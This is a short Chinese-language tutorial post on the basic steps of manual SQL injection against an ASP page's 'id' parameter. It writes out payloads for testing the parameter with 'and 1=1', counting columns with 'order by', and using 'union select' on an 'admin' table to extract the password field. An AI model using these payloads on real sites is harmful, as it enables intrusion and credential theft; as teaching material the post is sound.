来源:python中国网 时间:2019-08-31

  web渗透的基本思路和流程如下:

  1.判断and是否可用

  目的:判断url参数可控且参数被带入到sql执行

  例子:url末尾是asp?id=1则尝试asp?id=1 and 1=1

  2.猜字段数

  asp?id=1 order by 5 再增长大于5就报错,就是5个字段

  3.猜表名并联合查询判断回显点

  asp?id=1 union select 1,2,3,4,5 from admin

  union语法是前后2个语句select的字段数量保持一致,这一步和第2步猜测的5个字段数量一致。看看页面上1到5这几个数字是否能出现,能出现就是有回显点。

  4.将有回显点的地方改为字段名

  asp?id=1 union select 1,password,3,4,5 from admin

  假设第4步页面上出现数字2,这一步就是尝试查找管理员密码是什么,password这个字段名就是猜的。

  这是最初级的步骤,web渗透很多都是靠猜测,不知道web渗透的大佬是怎么炼成的。